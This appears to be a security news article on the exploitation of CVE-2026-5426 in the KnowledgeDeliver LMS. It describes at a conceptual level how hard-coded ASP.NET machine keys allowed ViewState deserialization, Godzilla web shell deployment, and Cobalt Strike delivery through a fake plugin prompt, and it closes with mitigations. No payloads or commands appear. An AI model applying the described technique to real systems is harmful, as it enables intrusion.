A recently patched high-severity vulnerability in the widely used Japanese Learning Management System (LMS) platform, Digital Knowledge KnowledgeDeliver, has been actively exploited by threat actors as a zero-day attack. Security researchers revealed that attackers used the flaw to deploy the notorious Godzilla web shell and later install Cobalt Strike Beacon malware on compromised systems.
Vulnerability Details
The flaw, tracked as CVE-2026-5426, carries a CVSS score of 7.5 and affects KnowledgeDeliver deployments released before February 24, 2026.
According to researchers from Google Mandiant and Google Threat Intelligence Group, the issue originated from hard-coded ASP.NET machine keys embedded within the platform’s configuration files. These machine keys are responsible for encrypting and signing ViewState data in ASP.NET applications.
Because the same machine keys were reused across multiple deployments, attackers who obtained the keys from one installation could exploit other internet-facing instances of the LMS platform.
How the Attack Worked
The attack relied on a ViewState deserialization technique. In ASP.NET applications, ViewState preserves page data between requests. However, when attackers know the machineKey values, they can craft malicious ViewState payloads and send them through the __VIEWSTATE parameter in HTTP requests.
Once processed by the server, the payload triggers deserialization and allows remote code execution without authentication.
Security researchers observed attackers exploiting the flaw to deploy the Godzilla web shell, also known as BLUEBEAM. This gave the attackers persistent access to compromised servers and enabled them to execute commands remotely or upload additional malicious payloads.
Attackers Modified LMS Files
After gaining access, the threat actors escalated their control over the server by changing file system permissions. Specifically, they granted “Everyone” full access to the LMS web application directory.
The attackers also tampered with a JavaScript file used by the application. The malicious modification displayed a fake security alert to users, urging them to install what appeared to be a “security authentication plugin.”
Behind the scenes, the altered JavaScript silently loaded a malicious script hosted on an attacker-controlled domain. Victims who downloaded the fake installer were ultimately infected with Cobalt Strike Beacon malware.
Researchers noted that the malware payload was encrypted using a key tied to the name of the compromised organization, suggesting that the campaign specifically targeted selected victims rather than conducting broad automated attacks.
Similar Attacks Observed Elsewhere
The exploitation of KnowledgeDeliver follows a growing trend involving exposed ASP.NET machine keys. Similar security issues have previously impacted platforms such as:
- Sitecore Experience Manager
- Gladinet CentreStack
- Gladinet TrioFox
Microsoft had earlier warned about threat actors abusing publicly disclosed ASP.NET machine keys in February 2025.
Why This Matters
This incident highlights the dangers of using shared secrets across software deployments. When vendors distribute identical cryptographic keys in deployment templates, a single leak can place every customer installation at risk.
Cybersecurity experts recommend organizations:
- Rotate and generate unique machine keys for every deployment
- Apply security patches immediately
- Monitor endpoints for suspicious activity
- Restrict unnecessary file permissions
- Implement stronger detection for deserialization attacks
Organizations running older versions of KnowledgeDeliver are strongly advised to update their systems and review logs for signs of compromise.
